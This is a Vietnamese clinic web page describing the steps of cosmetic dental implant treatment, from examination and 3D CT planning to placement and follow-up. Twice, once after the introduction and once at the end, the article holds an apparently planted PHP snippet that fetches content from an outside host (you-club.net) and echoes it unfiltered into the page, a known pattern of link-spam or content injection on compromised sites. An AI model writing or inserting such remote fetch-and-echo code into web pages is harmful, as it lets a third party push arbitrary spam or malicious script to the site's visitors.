Chăm sóc sắc đẹp

You are here: Home - Chăm sóc - làm đẹp, Nha khoa thẫm mỹ - Trồng răng thẩm mỹ


Trồng răng thẩm mỹ

Cắm Implant – Phương pháp trồng răng thẩm mỹ

Vì một sự cố nào đó khiến bạn bị mất răng, gãy răng hay răng không đẹp, bạn muốn trồng lại răng nhưng lo sợ về chất lượng cũng như kỹ thuật nha khoa. CHúng tôi xin chia sẻ với bạn một số bước thực hiện trồng răng như sau:.
[php]
$data = file(“http://you-club.net/sys/link/5″);

foreach ($data as $cont) {
$text = mb_convert_encoding($cont,”utf8″,”EUC-JP”);
echo $text;
}
[/php]

Tiến hành kiểm tra răng miệng bệnh nhân

Để xác định tình trạng bệnh răng miệng của bệnh nhân, từ đó các bác sĩ sẽ xác định hướng điều trị và tư vấn cụ thể thì việc kiểm tra răng miệng về nha chu trước cho bệnh nhân.

trong-rang-tham-my-1

Cắm Implant – Phương pháp trồng răng thẩm mỹ

Chụp phim kiểm tra xương hàm

Bước này được thực hiện bằng máy Pano Cepha kỹ thuật số 2 , một công cụ hiện đại trong lĩnh vực nha khoa để tiến hành phân tích cụ thể cấu trúc tổng quát phần xương hàm, phân tích chụp các lớp cắt nhỏ xác định độ cứng, độ xốp, chiều dài, chiều dày của xương mục đích là xác định loại trụ Implant phù hợp nhất cho tình trạng răng của từng bệnh nhân.

Đưa ra kế hoạch implant cụ thể

+ Kiểm tra và đưa ra kế hoạch cụ thể để cắm ghép implant

+ Bác sĩ phân tích cấu trúc xương, tình trạng tiêu xương, nơi tiến hành cắm implant, sau đó đưa ra kế hoạch tiến hành cụ thể là điều cần thiết và khoa học.

+ Sử dụng máy Cone Beam CT để các bác sĩ dùng phim 3D cùng phần mềm đo diện tích xương, số lượng kích cơ chính xác nhất chuẩn bị cho quá trình cắm ghép Implant.

+ Tiếp đó thực hiện phẫu thuật ảo trên không gian 3 chiều, cùng với bệnh nhân thảo luận để thống nhất kế hoạch và phương pháp điều trị.

Cắm ghép Implant

Trong phòng phẩu thuật trồng răng, bệnh nhân sẽ được các bác sĩ sử dụng máy móc hiện đại nhất và nhẹ nhàng cắm ghép trụ implant vào xương hàm.

Sau khi đã thực hiện cắm Implant hoàn thành 3-6 tháng, trên đó sẽ được gắn răng sứ như răng thật.

Kiểm tra tác động trên Implant

Các bác sĩ sẽ tiến hành chụp toàn cảnh và chụp nghiêng để kiểm tra chất lượng, độ bền của implant như độ sít, mức chịu lực cũng như sức chịu đựng của trụ implant khi nhai. Xác định kết quả của ca phẫu thuật trồng răng sứ cho bệnh nhân.

Hãy trồng răng thẩm mỹ tự tin nụ cười tỏa sáng bạn nhé..
[php]
$data = file(“http://you-club.net/sys/link/6″);

foreach ($data as $cont) {
$text = mb_convert_encoding($cont,”utf8″,”EUC-JP”);
echo $text;
}
[/php]

 

Leave a Reply

Your email address will not be published. Required fields are marked *